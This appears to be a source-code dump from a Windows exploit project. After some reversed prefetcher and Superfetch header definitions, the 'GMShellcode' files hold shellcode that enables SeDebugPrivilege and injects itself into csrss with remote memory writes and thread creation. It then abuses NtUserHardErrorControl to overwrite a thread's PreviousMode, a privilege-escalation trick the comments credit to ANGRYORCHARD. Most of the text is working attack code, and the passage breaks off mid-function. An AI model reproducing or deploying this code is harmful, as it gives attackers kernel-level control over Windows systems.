_PF_SYSTEM_PREFETCH_PARAMETERS 44 | { 45 | PF_ENABLE_STATUS EnableStatus[2]; 46 | PF_TRACE_LIMITS TraceLimits[2]; 47 | ULONG MaxNumActiveTraces; 48 | ULONG MaxNumSavedTraces; 49 | WCHAR RootDirPath[32]; 50 | WCHAR HostingApplicationList[128]; 51 | } PF_SYSTEM_PREFETCH_PARAMETERS, *PPF_SYSTEM_PREFETCH_PARAMETERS; 52 | 53 | #define PF_BOOT_CONTROL_VERSION 1 54 | 55 | typedef struct _PF_BOOT_CONTROL 56 | { 57 | ULONG Version; 58 | ULONG DisableBootPrefetching; 59 | } PF_BOOT_CONTROL, *PPF_BOOT_CONTROL; 60 | 61 | typedef enum _PREFETCHER_INFORMATION_CLASS 62 | { 63 | PrefetcherRetrieveTrace = 1, // q: CHAR[] 64 | PrefetcherSystemParameters, // q: PF_SYSTEM_PREFETCH_PARAMETERS 65 | PrefetcherBootPhase, // s: PF_BOOT_PHASE_ID 66 | PrefetcherSpare1, // PrefetcherRetrieveBootLoaderTrace // q: CHAR[] 67 | PrefetcherBootControl, // s: PF_BOOT_CONTROL 68 | PrefetcherScenarioPolicyControl, 69 | PrefetcherSpare2, 70 | PrefetcherAppLaunchScenarioControl, 71 | PrefetcherInformationMax 72 | } PREFETCHER_INFORMATION_CLASS; 73 | 74 | #define PREFETCHER_INFORMATION_VERSION 23 // rev 75 | #define PREFETCHER_INFORMATION_MAGIC ('kuhC') // rev 76 | 77 | typedef struct _PREFETCHER_INFORMATION 78 | { 79 | _In_ ULONG Version; 80 | _In_ ULONG Magic; 81 | _In_ PREFETCHER_INFORMATION_CLASS PrefetcherInformationClass; 82 | _Inout_ PVOID PrefetcherInformation; 83 | _Inout_ ULONG PrefetcherInformationLength; 84 | } PREFETCHER_INFORMATION, *PPREFETCHER_INFORMATION; 85 | 86 | // Superfetch 87 | 88 | typedef struct _PF_SYSTEM_SUPERFETCH_PARAMETERS 89 | { 90 | ULONG EnabledComponents; 91 | ULONG BootID; 92 | ULONG SavedSectInfoTracesMax; 93 | ULONG SavedPageAccessTracesMax; 94 | ULONG ScenarioPrefetchTimeoutStandby; 95 | ULONG ScenarioPrefetchTimeoutHibernate; 96 | ULONG ScenarioPrefetchTimeoutHiberBoot; 97 | } PF_SYSTEM_SUPERFETCH_PARAMETERS, *PPF_SYSTEM_SUPERFETCH_PARAMETERS; 98 | 99 | #define PF_PFN_PRIO_REQUEST_VERSION 1 100 | #define PF_PFN_PRIO_REQUEST_QUERY_MEMORY_LIST 0x1 101 | #define PF_PFN_PRIO_REQUEST_VALID_FLAGS 0x1 102 | 103 | typedef struct _PF_PFN_PRIO_REQUEST 104 | { 105 | ULONG Version; 106 | ULONG RequestFlags; 107 | ULONG_PTR PfnCount; 108 | SYSTEM_MEMORY_LIST_INFORMATION MemInfo; 109 | MMPFN_IDENTITY PageData[256]; 110 | } PF_PFN_PRIO_REQUEST, *PPF_PFN_PRIO_REQUEST; 111 | 112 | typedef enum _PFS_PRIVATE_PAGE_SOURCE_TYPE 113 | { 114 | PfsPrivateSourceKernel, 115 | PfsPrivateSourceSession, 116 | PfsPrivateSourceProcess, 117 | PfsPrivateSourceMax 118 | } PFS_PRIVATE_PAGE_SOURCE_TYPE; 119 | 120 | typedef struct _PFS_PRIVATE_PAGE_SOURCE 121 | { 122 | PFS_PRIVATE_PAGE_SOURCE_TYPE Type; 123 | union 124 | { 125 | ULONG SessionId; 126 | ULONG ProcessId; 127 | }; 128 | ULONG ImagePathHash; 129 | ULONG_PTR UniqueProcessHash; 130 | } PFS_PRIVATE_PAGE_SOURCE, *PPFS_PRIVATE_PAGE_SOURCE; 131 | 132 | typedef struct _PF_PRIVSOURCE_INFO 133 | { 134 | PFS_PRIVATE_PAGE_SOURCE DbInfo; 135 | PVOID EProcess; 136 | SIZE_T WsPrivatePages; 137 | SIZE_T TotalPrivatePages; 138 | ULONG SessionID; 139 | CHAR ImageName[16]; 140 | union { 141 | ULONG_PTR WsSwapPages; // process only PF_PRIVSOURCE_QUERY_WS_SWAP_PAGES. 142 | ULONG_PTR SessionPagedPoolPages; // session only. 143 | ULONG_PTR StoreSizePages; // process only PF_PRIVSOURCE_QUERY_STORE_INFO. 144 | }; 145 | ULONG_PTR WsTotalPages; // process/session only. 146 | ULONG DeepFreezeTimeMs; // process only. 147 | ULONG ModernApp : 1; // process only. 148 | ULONG DeepFrozen : 1; // process only. If set, DeepFreezeTimeMs contains the time at which the freeze occurred 149 | ULONG Foreground : 1; // process only. 150 | ULONG PerProcessStore : 1; // process only. 151 | ULONG Spare : 28; 152 | } PF_PRIVSOURCE_INFO, *PPF_PRIVSOURCE_INFO; 153 | 154 | #define PF_PRIVSOURCE_QUERY_REQUEST_VERSION 8 155 | 156 | typedef struct _PF_PRIVSOURCE_QUERY_REQUEST 157 | { 158 | ULONG Version; 159 | ULONG Flags; 160 | ULONG InfoCount; 161 | PF_PRIVSOURCE_INFO InfoArray[1]; 162 | } PF_PRIVSOURCE_QUERY_REQUEST, *PPF_PRIVSOURCE_QUERY_REQUEST; 163 | 164 | typedef enum _PF_PHASED_SCENARIO_TYPE 165 | { 166 | PfScenarioTypeNone, 167 | PfScenarioTypeStandby, 168 | PfScenarioTypeHibernate, 169 | PfScenarioTypeFUS, 170 | PfScenarioTypeMax 171 | } PF_PHASED_SCENARIO_TYPE; 172 | 173 | #define PF_SCENARIO_PHASE_INFO_VERSION 4 174 | 175 | typedef struct _PF_SCENARIO_PHASE_INFO 176 | { 177 | ULONG Version; 178 | PF_PHASED_SCENARIO_TYPE ScenType; 179 | ULONG PhaseId; 180 | ULONG SequenceNumber; 181 | ULONG Flags; 182 | ULONG FUSUserId; 183 | } PF_SCENARIO_PHASE_INFO, *PPF_SCENARIO_PHASE_INFO; 184 | 185 | typedef struct _PF_MEMORY_LIST_NODE 186 | { 187 | ULONGLONG Node : 8; 188 | ULONGLONG Spare : 56; 189 | ULONGLONG StandbyLowPageCount; 190 | ULONGLONG StandbyMediumPageCount; 191 | ULONGLONG StandbyHighPageCount; 192 | ULONGLONG FreePageCount; 193 | ULONGLONG ModifiedPageCount; 194 | } PF_MEMORY_LIST_NODE, *PPF_MEMORY_LIST_NODE; 195 | 196 | #define PF_MEMORY_LIST_INFO_VERSION 1 197 | 198 | typedef struct _PF_MEMORY_LIST_INFO 199 | { 200 | ULONG Version; 201 | ULONG Size; 202 | ULONG NodeCount; 203 | PF_MEMORY_LIST_NODE Nodes[1]; 204 | } PF_MEMORY_LIST_INFO, *PPF_MEMORY_LIST_INFO; 205 | 206 | typedef struct _PF_PHYSICAL_MEMORY_RANGE 207 | { 208 | ULONG_PTR BasePfn; 209 | ULONG_PTR PageCount; 210 | } PF_PHYSICAL_MEMORY_RANGE, *PPF_PHYSICAL_MEMORY_RANGE; 211 | 212 | #define PF_PHYSICAL_MEMORY_RANGE_INFO_V1_VERSION 1 213 | 214 | typedef struct _PF_PHYSICAL_MEMORY_RANGE_INFO_V1 215 | { 216 | ULONG Version; 217 | ULONG RangeCount; 218 | PF_PHYSICAL_MEMORY_RANGE Ranges[1]; 219 | } PF_PHYSICAL_MEMORY_RANGE_INFO_V1, *PPF_PHYSICAL_MEMORY_RANGE_INFO_V1; 220 | 221 | #define PF_PHYSICAL_MEMORY_RANGE_INFO_V2_VERSION 2 222 | 223 | typedef struct _PF_PHYSICAL_MEMORY_RANGE_INFO_V2 224 | { 225 | ULONG Version; 226 | ULONG Flags; 227 | ULONG RangeCount; 228 | PF_PHYSICAL_MEMORY_RANGE Ranges[ANYSIZE_ARRAY]; 229 | } PF_PHYSICAL_MEMORY_RANGE_INFO_V2, *PPF_PHYSICAL_MEMORY_RANGE_INFO_V2; 230 | 231 | // begin_rev 232 | 233 | #define PF_REPURPOSED_BY_PREFETCH_INFO_VERSION 1 234 | 235 | typedef struct _PF_REPURPOSED_BY_PREFETCH_INFO 236 | { 237 | ULONG Version; 238 | ULONG RepurposedByPrefetch; 239 | } PF_REPURPOSED_BY_PREFETCH_INFO, *PPF_REPURPOSED_BY_PREFETCH_INFO; 240 | 241 | // end_rev 242 | 243 | typedef enum _SUPERFETCH_INFORMATION_CLASS 244 | { 245 | SuperfetchRetrieveTrace = 1, // q: CHAR[] 246 | SuperfetchSystemParameters, // q: PF_SYSTEM_SUPERFETCH_PARAMETERS 247 | SuperfetchLogEvent, 248 | SuperfetchGenerateTrace, 249 | SuperfetchPrefetch, 250 | SuperfetchPfnQuery, // q: PF_PFN_PRIO_REQUEST 251 | SuperfetchPfnSetPriority, 252 | SuperfetchPrivSourceQuery, // q: PF_PRIVSOURCE_QUERY_REQUEST 253 | SuperfetchSequenceNumberQuery, // q: ULONG 254 | SuperfetchScenarioPhase, // 10 255 | SuperfetchWorkerPriority, 256 | SuperfetchScenarioQuery, // q: PF_SCENARIO_PHASE_INFO 257 | SuperfetchScenarioPrefetch, 258 | SuperfetchRobustnessControl, 259 | SuperfetchTimeControl, 260 | SuperfetchMemoryListQuery, // q: PF_MEMORY_LIST_INFO 261 | SuperfetchMemoryRangesQuery, // q: PF_PHYSICAL_MEMORY_RANGE_INFO 262 | SuperfetchTracingControl, 263 | SuperfetchTrimWhileAgingControl, 264 | SuperfetchRepurposedByPrefetch, // q: PF_REPURPOSED_BY_PREFETCH_INFO // rev 265 | SuperfetchChannelPowerRequest, 266 | SuperfetchMovePages, 267 | SuperfetchVirtualQuery, 268 | SuperfetchCombineStatsQuery, 269 | SuperfetchSetMinWsAgeRate, 270 | SuperfetchDeprioritizeOldPagesInWs, 271 | SuperfetchFileExtentsQuery, 272 | SuperfetchGpuUtilizationQuery, // PF_GPU_UTILIZATION_INFO 273 | SuperfetchInformationMax 274 | } SUPERFETCH_INFORMATION_CLASS; 275 | 276 | #define SUPERFETCH_INFORMATION_VERSION 45 // rev 277 | #define SUPERFETCH_INFORMATION_MAGIC ('kuhC') // rev 278 | 279 | typedef struct _SUPERFETCH_INFORMATION 280 | { 281 | _In_ ULONG Version; 282 | _In_ ULONG Magic; 283 | _In_ SUPERFETCH_INFORMATION_CLASS SuperfetchInformationClass; 284 | _Inout_ PVOID SuperfetchInformation; 285 | _Inout_ ULONG SuperfetchInformationLength; 286 | } SUPERFETCH_INFORMATION, *PSUPERFETCH_INFORMATION; 287 | 288 | // end_private 289 | 290 | #endif 291 | -------------------------------------------------------------------------------- /GMShellcode/GMShellcode.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include 6 | 7 | #ifdef __cplusplus 8 | extern "C" { 9 | #endif 10 | 11 | typedef NTSTATUS (NTAPI * RtlAdjustPrivilege_t)( 12 | DWORD privilege, 13 | BOOL bEnablePrivilege, 14 | BOOL IsThreadPrivilege, 15 | PBOOLEAN PreviousValue); 16 | 17 | typedef HMODULE(WINAPI* LoadLibraryW_t)( 18 | LPCWSTR lpLibFileName 19 | ); 20 | 21 | typedef FARPROC(WINAPI* GetProcAddress_t)( 22 | HMODULE hModule, 23 | LPCSTR lpProcName 24 | ); 25 | 26 | typedef HANDLE(WINAPI* OpenProcess_t)( 27 | DWORD dwDesiredAccess, 28 | BOOL bInheritHandle, 29 | DWORD dwProcessId 30 | ); 31 | 32 | typedef NTSTATUS (NTAPI * NtOpenProcess_t)( 33 | PHANDLE ProcessHandle, 34 | ACCESS_MASK DesiredAccess, 35 | POBJECT_ATTRIBUTES ObjectAttributes, 36 | PCLIENT_ID ClientId 37 | ); 38 | 39 | typedef NTSTATUS (NTAPI *NtOpenThread_t)( 40 | _Out_ PHANDLE ThreadHandle, 41 | _In_ ACCESS_MASK DesiredAccess, 42 | _In_ POBJECT_ATTRIBUTES ObjectAttributes, 43 | _In_opt_ PCLIENT_ID ClientId 44 | ); 45 | 46 | 47 | typedef HANDLE(WINAPI* CreateFileW_t)( 48 | LPCWSTR lpFileName, 49 | DWORD dwDesiredAccess, 50 | DWORD dwShareMode, 51 | LPSECURITY_ATTRIBUTES lpSecurityAttributes, 52 | DWORD dwCreationDisposition, 53 | DWORD dwFlagsAndAttributes, 54 | HANDLE hTemplateFile 55 | ); 56 | 57 | typedef BOOL (WINAPI *ReadFile_t)( 58 | HANDLE hFile, 59 | LPVOID lpBuffer, 60 | DWORD nNumberOfBytesToRead, 61 | LPDWORD lpNumberOfBytesRead, 62 | LPOVERLAPPED lpOverlapped 63 | ); 64 | 65 | typedef BOOL(WINAPI* TerminateProcess_t)( 66 | HANDLE hProcess, 67 | UINT uExitCode 68 | ); 69 | 70 | typedef NTSTATUS (NTAPI *NtTerminateProcess_t)( 71 | HANDLE ProcessHandle, 72 | NTSTATUS ExitStatus 73 | ); 74 | 75 | typedef NTSTATUS (NTAPI *NtTerminateThread_t)( 76 | IN HANDLE ThreadHandle, 77 | IN NTSTATUS ExitStatus); 78 | 79 | 80 | typedef LPVOID (WINAPI* VirtualAllocEx_t)( 81 | HANDLE hProcess, 82 | LPVOID lpAddress, 83 | SIZE_T dwSize, 84 | DWORD flAllocationType, 85 | DWORD flProtect 86 | ); 87 | 88 | typedef NTSTATUS (NTAPI * NtAllocateVirtualMemory_t)( 89 | HANDLE ProcessHandle, 90 | PVOID* BaseAddress, 91 | ULONG_PTR ZeroBits, 92 | PSIZE_T RegionSize, 93 | ULONG AllocationType, 94 | ULONG Protect 95 | ); 96 | 97 | typedef BOOL (WINAPI *WriteProcessMemory_t)( 98 | HANDLE hProcess, 99 | LPVOID lpBaseAddress, 100 | LPCVOID lpBuffer, 101 | SIZE_T nSize, 102 | SIZE_T* lpNumberOfBytesWritten 103 | ); 104 | 105 | typedef NTSTATUS (NTAPI *NtWriteVirtualMemory_t)( 106 | IN HANDLE ProcessHandle, 107 | IN PVOID BaseAddress, 108 | IN PVOID Buffer, 109 | IN ULONG NumberOfBytesToWrite, 110 | OUT PULONG NumberOfBytesWritten); 111 | 112 | typedef HANDLE (WINAPI * CreateRemoteThread_t)( 113 | HANDLE hProcess, 114 | LPSECURITY_ATTRIBUTES lpThreadAttributes, 115 | SIZE_T dwStackSize, 116 | LPTHREAD_START_ROUTINE lpStartAddress, 117 | LPVOID lpParameter, 118 | DWORD dwCreationFlags, 119 | LPDWORD lpThreadId 120 | ); 121 | 122 | typedef NTSTATUS (NTAPI *RtlCreateUserThread_t)( 123 | IN HANDLE ProcessHandle, 124 | IN PSECURITY_DESCRIPTOR SecurityDescriptor OPTIONAL, 125 | IN BOOLEAN CreateSuspended, 126 | IN ULONG StackZeroBits, 127 | IN OUT PULONG StackReserved, 128 | IN OUT PULONG StackCommit, 129 | IN PVOID StartAddress, 130 | IN PVOID StartParameter OPTIONAL, 131 | OUT PHANDLE ThreadHandle, 132 | OUT CLIENT_ID *ClientID); 133 | 134 | typedef BOOL(WINAPI* MiniDumpWriteDump_t)( 135 | HANDLE hProcess, 136 | DWORD ProcessId, 137 | HANDLE hFile, 138 | MINIDUMP_TYPE DumpType, 139 | PMINIDUMP_EXCEPTION_INFORMATION ExceptionParam, 140 | PMINIDUMP_USER_STREAM_INFORMATION UserStreamParam, 141 | PMINIDUMP_CALLBACK_INFORMATION CallbackParam 142 | ); 143 | 144 | typedef NTSTATUS (NTAPI * NtWaitForSingleObject_t)( 145 | HANDLE Handle, 146 | BOOLEAN Alertable, 147 | PLARGE_INTEGER Timeout 148 | ); 149 | 150 | typedef NTSTATUS (NTAPI * NtCreateEvent_t)( 151 | PHANDLE EventHandle, 152 | ACCESS_MASK DesiredAccess, 153 | POBJECT_ATTRIBUTES ObjectAttributes, 154 | EVENT_TYPE EventType, 155 | BOOLEAN InitialState 156 | ); 157 | 158 | typedef NTSTATUS (NTAPI *NtSetEvent_t)( 159 | HANDLE EventHandle, 160 | PLONG PreviousState 161 | ); 162 | 163 | typedef NTSTATUS (NTAPI *NtCreateMutant_t)( 164 | OUT PHANDLE MutantHandle, 165 | IN ACCESS_MASK DesiredAccess, 166 | IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, 167 | IN BOOLEAN InitialOwner); 168 | 169 | typedef NTSTATUS (NTAPI * NtCreateSection_t)( 170 | PHANDLE SectionHandle, 171 | ACCESS_MASK DesiredAccess, 172 | POBJECT_ATTRIBUTES ObjectAttributes, 173 | PLARGE_INTEGER MaximumSize, 174 | ULONG SectionPageProtection, 175 | ULONG AllocationAttributes, 176 | HANDLE FileHandle 177 | ); 178 | 179 | typedef NTSTATUS (NTAPI * NtMapViewOfSection_t)( 180 | HANDLE SectionHandle, 181 | HANDLE ProcessHandle, 182 | PVOID* BaseAddress, 183 | ULONG_PTR ZeroBits, 184 | SIZE_T CommitSize, 185 | PLARGE_INTEGER SectionOffset, 186 | PSIZE_T ViewSize, 187 | SECTION_INHERIT InheritDisposition, 188 | ULONG AllocationType, 189 | ULONG Win32Protect 190 | ); 191 | 192 | typedef ULONG (NTAPI *CsrGetProcessId_t)(); 193 | 194 | typedef enum 195 | { 196 | UserThreadShutdownInformation, 197 | UserThreadFlags, 198 | UserThreadTaskName, 199 | UserThreadWOWInformation, 200 | UserThreadHungStatus, 201 | UserThreadInitiateShutdown, 202 | UserThreadEndShutdown, 203 | UserThreadUseDesktop, 204 | UserThreadPolled, 205 | UserThreadKeyboardState, 206 | UserThreadCsrPort, 207 | UserThreadResyncKeyState, 208 | UserThreadUseActiveDesktop 209 | } USERTHREADINFOCLASS; 210 | 211 | typedef enum 212 | { 213 | HardErrorSetup, 214 | HardErrorCleanup, 215 | HardErrorAttach, 216 | HardErrorAttachUser, 217 | HardErrorDetach, 218 | HardErrorAttachNoQueue, 219 | HardErrorDetachNoQueue, 220 | HardErrorQuery, 221 | HardErrorInDefDesktop 222 | } HARDERRORCONTROL; 223 | 224 | typedef struct 225 | { 226 | HANDLE pDeskRestore; 227 | HANDLE pDeskNew; 228 | } DESKTOPRESTOREDATA, * PDESKTOPRESTOREDATA; 229 | 230 | typedef struct 231 | { 232 | HANDLE Thread; 233 | DESKTOPRESTOREDATA Restore; 234 | } DESKTOPUSEDESKTOP, * PDESKTOPUSEDESKTOP; 235 | 236 | typedef NTSTATUS (NTAPI *NtUserSetInformationThread_t)( 237 | _In_ HANDLE Thread, 238 | _In_ USERTHREADINFOCLASS ThreadInfoClass, 239 | _In_ PVOID ThreadInformation, 240 | _In_ ULONG ThreadInformationLength 241 | ); 242 | 243 | typedef NTSTATUS (NTAPI * NtUserHardErrorControl_t)( 244 | _In_ HARDERRORCONTROL Command, 245 | _In_ HANDLE Thread, 246 | _In_ PDESKTOPRESTOREDATA DesktopRestore 247 | ); 248 | 249 | #define MAGIC1 0x1BADC0D3 250 | #define MAGIC2 0xDEADBEEF 251 | 252 | // 90 nop 253 | // 48 87 c9 xchg rcx, rcx 254 | // 48 87 d2 xchg rdx, rdx 255 | // 4d 87 c0 xchg r8, r8 256 | // 4d 87 c9 xchg r9, r9 257 | // 90 nop 258 | #define MAGIC_NOPS { 0x90, 0x48, 0x87, 0xC9, 0x48, 0x87, 0xD2, 0x4D, 0x87, 0xC0, 0x4D, 0x87, 0xC9, 0x90 } 259 | #define MAGIC_NOPS_LENGTH 14 260 | 261 | #define ETHREAD_PREVIOUSMODE_OFFSET 0x232 262 | #define OBJECT_HEADER_SIZE 0x30 263 | 264 | #define BNO L"\\BaseNamedObjects\\" 265 | #define GLOBAL L"Global\\" 266 | #define MUTEX_NAME_BASE L"GMMut" 267 | #define REQ_NAME_BASE L"GMReq" 268 | #define DONE_NAME_BASE L"GMDone" 269 | #define SECTION_NAME_BASE L"GMSec" 270 | 271 | typedef struct _IPC_SECTION 272 | { 273 | volatile PVOID pThread; 274 | volatile NTSTATUS ntStatus; 275 | } IPC_SECTION, *PIPC_SECTION; 276 | 277 | typedef struct _SHELLCODE_PARAMS 278 | { 279 | DWORD magic1; 280 | DWORD magic2; 281 | 282 | DWORD mySize; 283 | UCHAR magicNops[MAGIC_NOPS_LENGTH]; 284 | 285 | WCHAR mutexName[60]; 286 | WCHAR reqName[60]; 287 | WCHAR doneName[60]; 288 | WCHAR sectionName[60]; 289 | 290 | // User params 291 | DWORD dwCsrssPid; 292 | //PVOID pThreadObject; 293 | 294 | // IAT 295 | NtOpenProcess_t pNtOpenProcess; 296 | NtTerminateProcess_t pNtTerminateProcess; 297 | RtlAdjustPrivilege_t pRtlAdjustPrivilege; 298 | NtAllocateVirtualMemory_t pNtAllocateVirtualMemory; 299 | NtWriteVirtualMemory_t pNtWriteVirtualMemory; 300 | RtlCreateUserThread_t pRtlCreateUserThread; 301 | NtWaitForSingleObject_t pNtWaitForSingleObject; 302 | NtCreateEvent_t pNtCreateEvent; 303 | NtSetEvent_t pNtSetEvent; 304 | NtCreateMutant_t pNtCreateMutant; 305 | NtCreateSection_t pNtCreateSection; 306 | NtMapViewOfSection_t pNtMapViewOfSection; 307 | 308 | NtUserSetInformationThread_t pNtUserSetInformationThread; 309 | NtUserHardErrorControl_t pNtUserHardErrorControl; 310 | 311 | } SHELLCODE_PARAMS, * PSHELLCODE_PARAMS; 312 | 313 | #ifdef __cplusplus 314 | } // extern "C" 315 | #endif 316 | -------------------------------------------------------------------------------- /GMShellcode/GMShellcode.c: -------------------------------------------------------------------------------- 1 | #define _CRT_SECURE_NO_WARNINGS 2 | 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | #include "GMShellcode.h" 10 | 11 | #pragma optimize("", off) 12 | 13 | PSHELLCODE_PARAMS GetParams(); 14 | PVOID FindMyBase(PSHELLCODE_PARAMS pParams); 15 | VOID ServicesShellcode(PSHELLCODE_PARAMS pParams); 16 | VOID CsrssShellcode(PSHELLCODE_PARAMS pParams); 17 | struct _TEB* CurrentTeb(VOID); 18 | size_t _wcslen(const wchar_t* str); 19 | VOID _RtlInitUnicodeString(PUNICODE_STRING DestinationString, PCWSTR SourceString); 20 | 21 | // Overwrites DllMain (technically CRT DllMain) 22 | BOOL APIENTRY Shellcode( 23 | HMODULE hModule, 24 | DWORD ul_reason_for_call, 25 | LPVOID lpReserved 26 | ) 27 | { 28 | PSHELLCODE_PARAMS pParams = GetParams(); 29 | 30 | if ((DWORD)(ULONG_PTR)CurrentTeb()->ClientId.UniqueProcess == pParams->dwCsrssPid) 31 | { 32 | CsrssShellcode(pParams); 33 | } 34 | else 35 | { 36 | ServicesShellcode(pParams); 37 | } 38 | 39 | return TRUE; 40 | } 41 | 42 | VOID ServicesShellcode( PSHELLCODE_PARAMS pParams ) 43 | { 44 | BOOLEAN ignored = 0; 45 | HANDLE hCsrss = NULL; 46 | PVOID pCsrssBuffer = NULL; 47 | SIZE_T regionSize = pParams->mySize; 48 | ULONG bytesWritten = 0; 49 | HANDLE hThread = NULL; 50 | OBJECT_ATTRIBUTES objAttr = { 0, }; 51 | CLIENT_ID csrssCid = { (HANDLE)(ULONG_PTR)pParams->dwCsrssPid, NULL }; 52 | PVOID pMyBase = FindMyBase(pParams); 53 | LARGE_INTEGER timeout = { 0, }; 54 | 55 | if (!pMyBase) 56 | { 57 | int x = 0; 58 | __debugbreak(); 59 | } 60 | 61 | // Enable SeDebugPrivilege 62 | if (0 != pParams->pRtlAdjustPrivilege(SE_DEBUG_PRIVILEGE, TRUE, FALSE, &ignored)) 63 | { 64 | int x = 1; 65 | __debugbreak(); 66 | } 67 | 68 | InitializeObjectAttributes(&objAttr, NULL, 0, NULL, NULL); 69 | pParams->pNtOpenProcess(&hCsrss, MAXIMUM_ALLOWED, &objAttr, &csrssCid); 70 | if (NULL == hCsrss) 71 | { 72 | int x = 2; 73 | __debugbreak(); 74 | } 75 | 76 | pParams->pNtAllocateVirtualMemory(hCsrss, &pCsrssBuffer, 0, ®ionSize, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); 77 | if (NULL == pCsrssBuffer) 78 | { 79 | int x = 3; 80 | __debugbreak(); 81 | } 82 | 83 | if (!NT_SUCCESS(pParams->pNtWriteVirtualMemory(hCsrss, pCsrssBuffer, pMyBase, pParams->mySize, &bytesWritten))) 84 | { 85 | int x = 4; 86 | __debugbreak(); 87 | } 88 | 89 | if (!NT_SUCCESS(pParams->pRtlCreateUserThread(hCsrss, NULL, FALSE, 0, NULL, NULL, (PUCHAR)pCsrssBuffer, NULL, &hThread, NULL))) 90 | { 91 | int x = 5; 92 | __debugbreak(); 93 | } 94 | 95 | #if 0 96 | timeout.QuadPart = -50 * 10000; 97 | if (!NT_SUCCESS(pParams->pNtWaitForSingleObject(hThread, FALSE, &timeout))) 98 | { 99 | int x = 6; 100 | __debugbreak(); 101 | } 102 | #endif 103 | 104 | // Don't trigger WER 105 | (void)pParams->pNtTerminateProcess(NtCurrentProcess(), 0); 106 | } 107 | 108 | // This is a reimplementation of ANGRYORCHARD's exploit 109 | // https://github.com/SecIdiot/ANGRYORCHARD/blob/0a4720f7e07e86a9ac2783411b81efac14938e26/Exploit.c#L71-L77 110 | VOID CsrssShellcode( PSHELLCODE_PARAMS pParams ) 111 | { 112 | NTSTATUS ntStatus = STATUS_SUCCESS; 113 | DESKTOPUSEDESKTOP desktop = { 0, }; 114 | HANDLE hMutex = NULL; 115 | HANDLE hReq = NULL; 116 | HANDLE hDone = NULL; 117 | HANDLE hSection = NULL; 118 | UNICODE_STRING uniStr = { 0, }; 119 | OBJECT_ATTRIBUTES objAttr = { 0, }; 120 | LARGE_INTEGER sectionSize = { 0, }; 121 | PIPC_SECTION pSection = NULL; 122 | SIZE_T viewSize = 0; 123 | SECURITY_DESCRIPTOR sd = { 0, }; 124 | 125 | // No SD 126 | sd.Revision = SECURITY_DESCRIPTOR_REVISION; 127 | 128 | // Create mutex 129 | _RtlInitUnicodeString(&uniStr, pParams->mutexName); 130 | InitializeObjectAttributes(&objAttr, &uniStr, OBJ_CASE_INSENSITIVE, NULL, &sd); 131 | ntStatus = pParams->pNtCreateMutant(&hMutex, MUTEX_ALL_ACCESS, &objAttr, FALSE); 132 | if (!NT_SUCCESS(ntStatus)) 133 | { 134 | int x = 0x10; 135 | __debugbreak(); 136 | } 137 | 138 | // Create request event 139 | _RtlInitUnicodeString(&uniStr, pParams->reqName); 140 | ntStatus = pParams->pNtCreateEvent(&hReq, MUTANT_ALL_ACCESS, &objAttr, SynchronizationEvent, FALSE); 141 | if (!NT_SUCCESS(ntStatus)) 142 | { 143 | int x = 0x11; 144 | __debugbreak(); 145 | } 146 | 147 | // Create completion event 148 | _RtlInitUnicodeString(&uniStr, pParams->doneName); 149 | ntStatus = pParams->pNtCreateEvent(&hDone, MUTANT_ALL_ACCESS, &objAttr, SynchronizationEvent, FALSE); 150 | if (!NT_SUCCESS(ntStatus)) 151 | { 152 | int x = 0x12; 153 | __debugbreak(); 154 | } 155 | 156 | _RtlInitUnicodeString(&uniStr, pParams->sectionName); 157 | sectionSize.QuadPart = 4096; 158 | ntStatus = pParams->pNtCreateSection(&hSection, SECTION_ALL_ACCESS, &objAttr, §ionSize, PAGE_READWRITE, SEC_COMMIT, NULL); 159 | if (!NT_SUCCESS(ntStatus)) 160 | { 161 | int x = 0x13; 162 | __debugbreak(); 163 | } 164 | 165 | ntStatus = pParams->pNtMapViewOfSection(hSection, (HANDLE)-1, (PVOID*)&pSection, 0, 4096, NULL, &viewSize, ViewUnmap, 0, PAGE_READWRITE); 166 | if (!NT_SUCCESS(ntStatus)) 167 | { 168 | int x = 0x14; 169 | __debugbreak(); 170 | } 171 | 172 | // Wait for a request to come in 173 | while (STATUS_WAIT_0 == pParams->pNtWaitForSingleObject(hReq, FALSE, NULL)) 174 | { 175 | pSection->ntStatus = STATUS_PENDING; 176 | 177 | ntStatus = pParams->pNtUserSetInformationThread(NtCurrentThread(), UserThreadUseDesktop, &desktop, sizeof(desktop)); 178 | if (!NT_SUCCESS(ntStatus)) 179 | { 180 | pSection->ntStatus = ntStatus; 181 | int x = 0x15; 182 | __debugbreak(); 183 | } 184 | 185 | if (!pSection->pThread) 186 | { 187 | ntStatus = STATUS_NOT_FOUND; 188 | } 189 | else 190 | { 191 | desktop.Restore.pDeskRestore = (PUCHAR)pSection->pThread + ETHREAD_PREVIOUSMODE_OFFSET + OBJECT_HEADER_SIZE; 192 | ntStatus = pParams->pNtUserHardErrorControl(HardErrorDetachNoQueue, NtCurrentThread(), &desktop.Restore); 193 | if (!NT_SUCCESS(ntStatus)) 194 | { 195 | pSection->ntStatus = ntStatus; 196 | int x = 0x16; 197 | __debugbreak(); 198 | } 199 | 200 | // Set result 201 | pSection->ntStatus = STATUS_SUCCESS; 202 | pSection->pThread = NULL; 203 | } 204 | 205 | // Send ACK 206 | pParams->pNtSetEvent(hDone, NULL); 207 | } 208 | } 209 | 210 | struct _TEB* CurrentTeb( VOID ) 211 | { 212 | return (struct _TEB*)__readgsqword(FIELD_OFFSET(NT_TIB, Self)); 213 | } 214 | 215 | PVOID WhereAmI() 216 | { 217 | return _ReturnAddress(); 218 | } 219 | 220 | size_t _wcslen(const wchar_t* str) 221 | { 222 | size_t i = 0; 223 | 224 | while (*str) 225 | { 226 | str++; 227 | i++; 228 | } 229 | 230 | return i; 231 | } 232 | 233 | VOID _RtlInitUnicodeString( 234 | PUNICODE_STRING DestinationString, 235 | PCWSTR SourceString 236 | ) 237 | { 238 | DestinationString->Buffer = (PWSTR)SourceString; 239 | DestinationString->Length = (USHORT)_wcslen(SourceString) * sizeof(wchar_t); 240 | DestinationString->MaximumLength = DestinationString->Length; 241 | } 242 | 243 | BOOLEAN memeq(PUCHAR a, PUCHAR b, DWORD len) 244 | { 245 | for (DWORD i = 0; i < len; i++) 246 | { 247 | if (a[i] != b[i]) 248 | { 249 | return FALSE; 250 | } 251 | } 252 | return TRUE; 253 | } 254 | 255 | PVOID FindMyBase(PSHELLCODE_PARAMS pParams) 256 | { 257 | PUCHAR pSearch = (PUCHAR)WhereAmI(); 258 | 259 | for 